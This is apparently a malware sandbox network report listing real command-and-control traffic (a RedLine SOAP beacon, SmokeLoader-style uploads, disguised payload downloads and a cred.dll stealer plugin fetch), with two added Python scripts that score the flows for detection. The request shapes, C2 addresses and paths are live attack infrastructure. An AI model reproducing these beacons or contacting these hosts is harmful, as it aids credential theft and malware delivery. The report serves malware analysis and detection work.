Expires: Sat, 01 Jan 2000 00:00:00 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
content-security-policy: default-src * data: blob: 'self';script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;
X-Frame-Options: DENY
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: dP4Zlc2FbAP4370Id7vr780hn7ZrIzXZ7c3QocLGK6aCuAtBB+2hi4KD0Lpt7NYKeoUy7ZQu1KGgMdiOvMC4jg==
Date: Fri, 02 Jul 2021 07:17:06 GMT
Transfer-Encoding: chunked
Connection: keep-alive

• DNS www.binance.com
chrome.exe
Remote address: 8.8.8.8:53
Request
www.binance.com IN A
Response
www.binance.com IN CNAME dobbmei4jnjlh.cloudfront.net
dobbmei4jnjlh.cloudfront.net IN A 52.84.150.16
dobbmei4jnjlh.cloudfront.net IN A 52.84.150.20
dobbmei4jnjlh.cloudfront.net IN A 52.84.150.33
dobbmei4jnjlh.cloudfront.net IN A 52.84.150.4

• GET https://www.binance.com/en/register?ref=WDA8929C
MicrosoftEdgeCP.exe
Remote address: 52.84.150.16:443
Request
GET /en/register?ref=WDA8929C HTTP/2.0
host: www.binance.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
Response
HTTP/2.0 403
server: CloudFront
date: Fri, 02 Jul 2021 07:17:06 GMT
content-type: text/html
content-length: 919
x-cache: Error from cloudfront
via: 1.1 618e94643d6094e9ff9adbaaa8ed3aef.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS50-C1
x-amz-cf-id: ArlYng-8r7RLRJpFJSQtbIlx6h6DD8krLhJyfvqL_db5LNeDiHbmaQ==

• GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwyMERESEZGVmJnQQ/1.0.0.6_nmmhkkegccagdldgiimedpiccmgmieda.crx
chrome.exe
Remote address: 34.104.35.123:80
Request
GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwyMERESEZGVmJnQQ/1.0.0.6_nmmhkkegccagdldgiimedpiccmgmieda.crx HTTP/1.1
Host: edgedl.me.gvt1.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Response
HTTP/1.1 200 OK
accept-ranges: bytes
content-disposition: attachment
content-length: 248531
content-security-policy: default-src 'none'
content-type: application/x-chrome-extension
etag: "83cafb"
last-modified: Fri, 29 Jan 2021 00:09:35 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Fri, 02 Jul 2021 07:01:41 GMT
age: 917
alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
cache-control: public,max-age=86400

• POST http://79.174.12.174/base/api/getData.php
arnatic_6.exe
Remote address: 79.174.12.174:80
Request
POST /base/api/getData.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 497
Host: 79.174.12.174
Response
HTTP/1.1 200 OK
Date: Fri, 02 Jul 2021 07:16:58 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
X-Powered-By: PHP/8.0.7
Content-Length: 108
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

• POST http://79.174.12.174/base/api/getData.php
arnatic_6.exe
Remote address: 79.174.12.174:80
Request
POST /base/api/getData.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 133
Host: 79.174.12.174
Response
HTTP/1.1 200 OK
Date: Fri, 02 Jul 2021 07:17:00 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
X-Powered-By: PHP/8.0.7
Content-Length: 108
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
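
One way to pull the beacons out of a flow list like this, as an added example that is not part of the tria.ge report or its signature set: the records are constructed from the requests shown on this page (the Edge and Chrome fetches, the arnatic_6.exe POSTs to 79.174.12.174, and the arnatic_7.exe SOAP POST to the RedLine C2 87.251.71.195:82 from the extracted config), with the request bodies, which the report does not show, left out. The five scoring rules, the 4-point threshold and the BROWSERS allow-list are this example's own heuristics, not tria.ge's.

```python
"""Pull the C2 beacons out of a sandbox HTTP flow list.

Added example, not part of the tria.ge report: the flow records below are
constructed from the requests shown on this page (process, remote address,
request line and headers), and the scoring rules are this example's own
heuristics rather than tria.ge's signatures.
"""
import ipaddress
import re
from dataclasses import dataclass

# Processes that are expected to speak HTTP with a browser User-Agent.
BROWSERS = {"chrome.exe", "msedge.exe", "MicrosoftEdgeCP.exe", "firefox.exe", "iexplore.exe"}


@dataclass(frozen=True)
class Flow:
    process: str   # image name shown under the URL in the report
    remote: str    # "ip:port" as shown under "Remote address"
    request: str   # request line followed by headers, one per line

    @property
    def port(self) -> int:
        return int(self.remote.rsplit(":", 1)[1])

    @property
    def request_line(self) -> str:
        return self.request.strip().splitlines()[0]

    @property
    def method(self) -> str:
        return self.request_line.split()[0]

    def headers(self) -> dict[str, str]:
        """Header names lower-cased; a repeated header keeps its last value."""
        out = {}
        for line in self.request.strip().splitlines()[1:]:
            name, sep, value = line.partition(":")
            if sep:
                out[name.strip().lower()] = value.strip()
        return out


def score_flow(flow: Flow) -> tuple[int, list[str]]:
    """Return (score, reasons) for one flow. Higher means more C2-like."""
    h = flow.headers()
    score, reasons = 0, []

    # 1. Host header is a bare IP: no DNS name was needed to reach the server.
    #    (IPv4 only; a bracketed IPv6 literal would need separate handling.)
    try:
        ipaddress.ip_address(h.get("host", "").rsplit(":", 1)[0])
        score += 2
        reasons.append("Host header is a bare IP")
    except ValueError:
        pass

    # 2. HTTP on a port other than 80/443.
    if flow.port not in (80, 443):
        score += 2
        reasons.append(f"non-standard port {flow.port}")

    # 3. SOAPAction in the default WCF namespace (tempuri.org): the shape of the
    #    RedLine .NET client's beacon, and nothing a browser ever sends.
    if "tempuri.org" in h.get("soapaction", ""):
        score += 3
        reasons.append("SOAPAction in tempuri.org (default WCF namespace)")

    # 4. A non-browser process presenting a Chrome-style User-Agent.
    if flow.process not in BROWSERS and re.search(r"Mozilla/5\.0.*Chrome/", h.get("user-agent", "")):
        score += 2
        reasons.append("non-browser process spoofing a browser User-Agent")

    # 5. POST straight to a PHP script from a non-browser process.
    if flow.method == "POST" and flow.process not in BROWSERS and re.search(r"\.php(\?|\s|$)", flow.request_line):
        score += 1
        reasons.append("POST to a PHP endpoint from a non-browser process")

    return score, reasons


def triage(flows: list[Flow], threshold: int = 4) -> list[tuple[Flow, int, list[str]]]:
    """Return the flows whose score reaches the threshold, in input order."""
    hits = []
    for flow in flows:
        score, reasons = score_flow(flow)
        if score >= threshold:
            hits.append((flow, score, reasons))
    return hits


# Constructed from the flows on this page (request bodies are not shown there).
SAMPLE_FLOWS = [
    Flow("MicrosoftEdgeCP.exe", "52.84.150.16:443",
         "GET /en/register?ref=WDA8929C HTTP/2.0\n"
         "host: www.binance.com\n"
         "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063\n"),
    Flow("chrome.exe", "34.104.35.123:80",
         "GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwyMERESEZGVmJnQQ/1.0.0.6_nmmhkkegccagdldgiimedpiccmgmieda.crx HTTP/1.1\n"
         "Host: edgedl.me.gvt1.com\n"
         "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36\n"),
    Flow("arnatic_6.exe", "79.174.12.174:80",
         "POST /base/api/getData.php HTTP/1.1\n"
         "Content-Type: application/x-www-form-urlencoded\n"
         "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\n"
         "Host: 79.174.12.174\n"),
    Flow("arnatic_7.exe", "87.251.71.195:82",
         "POST / HTTP/1.1\n"
         "Content-Type: text/xml; charset=utf-8\n"
         'SOAPAction: "http://tempuri.org/Endpoint/GetArguments"\n'
         "Host: 87.251.71.195:82\n"),
]

if __name__ == "__main__":
    for flow, score, reasons in triage(SAMPLE_FLOWS):
        print(f"{flow.process} -> {flow.remote}  score={score}  {'; '.join(reasons)}")
```

Run stand-alone it reports only the two arnatic_*.exe flows. The SOAPAction rule is the one worth keeping in a production ruleset, since no browser sends a tempuri.org SOAPAction; the bare-IP and odd-port rules on their own also match plenty of legitimate software, so tune the threshold against your own traffic before deploying.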
• POST
http://87.251.71.195:82/
arnatic_7.exe
Remote address:
87.251.71.195:82
Request
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: 87.251.71.195:82
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
• POST
http://lahuertasonora.com/upload/
Remote address:
220.125.1.129:80
Request
POST /upload/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://lahuertasonora.com/upload/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 254
Host: lahuertasonora.com
Response
HTTP/1.0 404 Not Found
Date: Fri, 02 Jul 2021 07:17:02 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 334
Connection: close
Content-Type: text/html; charset=utf-8
• POST
http://iw.gamegame.info/report7.4.php
SystemNetworkService
Remote address:
104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 278
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:17:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07ad0f8b0000c761f1a9f000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=37IndqeRD71Idk3UNuK6MEUWu0B3IhgGSYmDAsfEHF9ebhNVcEfE4UUh2N%2BEc5gAQAVdd%2F%2Bcw9WTaDSHhZNvkZhq5rxnVGEIGsTJDuhArt1lQ7VXOg0MYcXCbCZuXg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 668617927eb4c761-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
• DNS
iplis.ru
chrome.exe
Remote address:
8.8.8.8:53
Request
iplis.ru
IN A
Response
iplis.ru
IN A
88.99.66.31
• GET
https://iplis.ru/1S3fd7.mp3
arnatic_6.exe
Remote address:
88.99.66.31:443
Request
GET /1S3fd7.mp3 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: iplis.ru
Response
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Jul 2021 07:17:04 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=ejuru0d9nfado0aipfn5bmkee4; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=193.110.95.34; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253837967; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers: 10
whoami: 4fbe470fe4cdccc3f36e2d118c6af547fd4258d04a0802365c46793069702372
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
• GET
https://iplis.ru/1G8Fx7.mp3
arnatic_6.exe
Remote address:
88.99.66.31:443
Request
GET /1G8Fx7.mp3 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: iplis.ru
Response
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Jul 2021 07:17:05 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=q4ktqpi5116hl975forfrau9t7; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=193.110.95.34; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253837966; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers: 16
whoami: 4fbe470fe4cdccc3f36e2d118c6af547fd4258d04a0802365c46793069702372
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
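The records above show three request shapes worth turning into checks: the RedLine beacon (a SOAP POST with a tempuri.org SOAPAction to a bare IP:port), the SmokeLoader check-ins (IE11 User-Agent, POST to /upload/ with a Referer equal to the request URL), and the iplis.ru downloads (an .mp3 URL answered as image/png with the non-standard "Answers" and "whoami" headers). The script below is an added example, not part of the tria.ge report or any of the malware families it describes: it parses records in the report's one-field-per-line layout and applies those heuristics. The heuristic names, the extension-to-Content-Type table and the list of "common" response headers are this example's own choices; the sample input is transcribed from the records above, trimmed to the headers the checks use.

```python
import re
from urllib.parse import urlparse

# Constructed input: three of the records above, transcribed in the report's
# one-field-per-line layout (only the headers the checks use) and separated by "---".
RECORDS = """\
POST
http://87.251.71.195:82/
arnatic_7.exe
Remote address:
87.251.71.195:82
Request
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Expect: 100-continue
---
POST
http://lahuertasonora.com/upload/
Remote address:
220.125.1.129:80
Request
Referer: http://lahuertasonora.com/upload/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Response
HTTP/1.0 404 Not Found
Content-Type: text/html; charset=utf-8
---
GET
https://iplis.ru/1S3fd7.mp3
arnatic_6.exe
Remote address:
88.99.66.31:443
Request
Host: iplis.ru
Response
HTTP/1.1 200 OK
Content-Type: image/png
Answers: 10
whoami: 4fbe470fe4cdccc3f36e2d118c6af547fd4258d04a0802365c46793069702372
"""

IP_HOST = re.compile(r"^\d{1,3}(\.\d{1,3}){3}(:\d+)?$")
# Content-Type prefix a URL ending in this extension should come back with (example's own table).
EXPECTED_TYPE = {".mp3": "audio/", ".png": "image/png", ".jpg": "image/jpeg"}
# Response headers a stock web server or CDN emits; anything else deserves a look.
COMMON_RESPONSE = {"date", "server", "content-type", "content-length",
                   "transfer-encoding", "connection", "keep-alive", "set-cookie",
                   "pragma", "cache-control", "expires", "x-powered-by",
                   "strict-transport-security", "x-frame-options"}


def parse_record(text):
    """Flat record -> dict. Header names are lower-cased; a repeated header
    (Set-Cookie above) keeps its last value, which is enough for these checks."""
    lines = text.strip().splitlines()
    rec = {"method": lines[0], "url": lines[1], "process": None,
           "status": None, "req": {}, "resp": {}}
    i = 2
    if lines[i] != "Remote address:":      # the process line is optional
        rec["process"], i = lines[i], i + 1
    rec["remote"] = lines[i + 1]
    section = None
    for line in lines[i + 2:]:
        if line in ("Request", "Response"):
            section = "req" if line == "Request" else "resp"
        elif section == "resp" and line.startswith("HTTP/"):
            rec["status"] = int(line.split()[1])
        elif not (section == "req" and line.startswith(rec["method"] + " ")):
            name, _, value = line.partition(":")   # the request line itself is skipped
            rec[section][name.strip().lower()] = value.strip()
    return rec


def triage(rec):
    """Names of the heuristics this record trips, in a fixed order (empty if none)."""
    req, resp, url = rec["req"], rec["resp"], urlparse(rec["url"])
    hits = []
    # tempuri.org (the WCF default namespace) plus a bare IP:port: the RedLine beacon above.
    if "tempuri.org" in req.get("soapaction", "") and IP_HOST.match(url.netloc):
        hits.append("soap-to-bare-ip")
    # POST, IE11 UA string, Referer equal to its own URL: the SmokeLoader /upload/ check-ins above.
    if (rec["method"] == "POST" and "Trident/7.0" in req.get("user-agent", "")
            and req.get("referer") == rec["url"]):
        hits.append("self-referer-post")
    # An .mp3 URL answered as image/png: the extension is camouflage.
    ctype = resp.get("content-type", "").lower()
    if any(url.path.endswith(e) and ctype and not ctype.startswith(t)
           for e, t in EXPECTED_TYPE.items()):
        hits.append("content-type-mismatch")
    # "Answers" and "whoami" are not headers any stock server sends.
    odd = sorted(h for h in resp if h not in COMMON_RESPONSE)
    if odd:
        hits.append("nonstandard-headers:" + ",".join(odd))
    return hits


if __name__ == "__main__":   # one line per record when run directly
    print({r["url"]: triage(r) for r in map(parse_record, RECORDS.split("---"))})
```

Two caveats from the same records. The 403 on iw.gamegame.info carries CF-Chl-Bypass and a cloudflare Server header, so it is the CDN's challenge page, not a reply from the backend; it says nothing about what report7.4.php does. Likewise the 404s from lahuertasonora.com only mean those particular POSTs were rejected: the indicator is the request shape, and the process keeps sending (Content-Length 254, then 348), so a 404 is no reason to drop the domain. The Expect: 100-continue header on the RedLine beacon is what a .NET HttpWebRequest sends by default on a POST, consistent with the C# family named in the signatures.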
• POST
http://lahuertasonora.com/upload/
Remote address:
220.125.1.129:80
Request
POST /upload/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://lahuertasonora.com/upload/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 348
Host: lahuertasonora.com
Response
HTTP/1.0 404 Not Found
Date: Fri, 02 Jul 2021 07:17:08 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 334
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://www.binance.com/favicon.ico
                                                                                                                                                                                        MicrosoftEdge.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        52.84.150.16:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /favicon.ico HTTP/2.0
                                                                                                                                                                                        host: www.binance.com
                                                                                                                                                                                        accept: */*
                                                                                                                                                                                        accept-encoding: gzip, deflate, br
                                                                                                                                                                                        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                                                                                                                        dnt: 1
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/2.0 404
                                                                                                                                                                                        content-type: text/html
                                                                                                                                                                                        date: Fri, 02 Jul 2021 07:17:13 GMT
                                                                                                                                                                                        server: Tengine
                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                        etag: W/"60deb94f-197a"
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        referrer-policy: origin-when-cross-origin
                                                                                                                                                                                        strict-transport-security: max-age=31536000; includeSubdomains
                                                                                                                                                                                        content-encoding: gzip
                                                                                                                                                                                        x-cache: Error from cloudfront
                                                                                                                                                                                        via: 1.1 a8e7255a7d8a262e371be5d5c9ca1106.cloudfront.net (CloudFront)
                                                                                                                                                                                        x-amz-cf-pop: ATL56-C1
                                                                                                                                                                                        x-amz-cf-id: gXBEWBcBdqg3KLNwBBYFV7Eo-rIxikTBTjR238D0APGIh0ECO3PIpA==
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        safebrowsing.googleapis.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        safebrowsing.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        safebrowsing.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        142.250.179.138
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://uyg5wye.2ihsfa.com/api/fbtime
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.218.92.148:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /api/fbtime HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        Host: uyg5wye.2ihsfa.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:13 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        X-Powered-By: PHP/7.3.21
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://uyg5wye.2ihsfa.com/api/?sid=291397&key=a03dc225caaa0cfbcbcb07b734813bd3
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.218.92.148:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /api/?sid=291397&key=a03dc225caaa0cfbcbcb07b734813bd3 HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        Content-Length: 266
                                                                                                                                                                                        Host: uyg5wye.2ihsfa.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:13 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        X-Powered-By: PHP/7.3.21
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/plugins/cred.dll
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /t5BnOoke2/plugins/cred.dll HTTP/1.1
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:13 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Last-Modified: Sat, 26 Jun 2021 10:32:28 GMT
                                                                                                                                                                                        ETag: "1f200-5c5a8c5d80700"
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Content-Length: 127488
                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        www.msftconnecttest.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        www.msftconnecttest.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        www.msftconnecttest.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        v4ncsi.msedge.net
                                                                                                                                                                                        v4ncsi.msedge.net
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        ncsi.4-c-0003.c-msedge.net
  ncsi.4-c-0003.c-msedge.net IN CNAME 4-c-0003.c-msedge.net
  4-c-0003.c-msedge.net IN A 13.107.4.52

• DNS edgedl.me.gvt1.com (chrome.exe)
  Remote address: 8.8.8.8:53
  Request
  edgedl.me.gvt1.com IN A
  Response
  edgedl.me.gvt1.com IN A 34.104.35.123

• HEAD http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ
  Remote address: 34.104.35.123:80
  Request
  HEAD /edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  Accept-Encoding: identity
  User-Agent: Microsoft BITS/7.8
  Host: edgedl.me.gvt1.com
  Response
  HTTP/1.1 200 OK
  accept-ranges: bytes
  content-disposition: attachment
  content-length: 5558
  content-security-policy: default-src 'none'
  content-type: application/octet-stream
  etag: "748e44"
  last-modified: Tue, 13 Oct 2020 23:46:14 GMT
  server: Google-Edge-Cache
  x-content-type-options: nosniff
  x-frame-options: SAMEORIGIN
  x-xss-protection: 0
  date: Thu, 01 Jul 2021 11:01:03 GMT
  age: 72970
  alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
  cache-control: public,max-age=86400

• GET http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ
  Remote address: 34.104.35.123:80
  Request
  GET /edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  Accept-Encoding: identity
  If-Unmodified-Since: Tue, 13 Oct 2020 23:46:14 GMT
  Range: bytes=0-1119
  User-Agent: Microsoft BITS/7.8
  Host: edgedl.me.gvt1.com
  Response
  HTTP/1.1 206 Partial Content
  accept-ranges: bytes
  content-disposition: attachment
  content-length: 1120
  content-security-policy: default-src 'none'
  content-type: application/octet-stream
  etag: "748e44"
  last-modified: Tue, 13 Oct 2020 23:46:14 GMT
  server: Google-Edge-Cache
  x-content-type-options: nosniff
  x-frame-options: SAMEORIGIN
  x-xss-protection: 0
  date: Thu, 01 Jul 2021 11:01:03 GMT
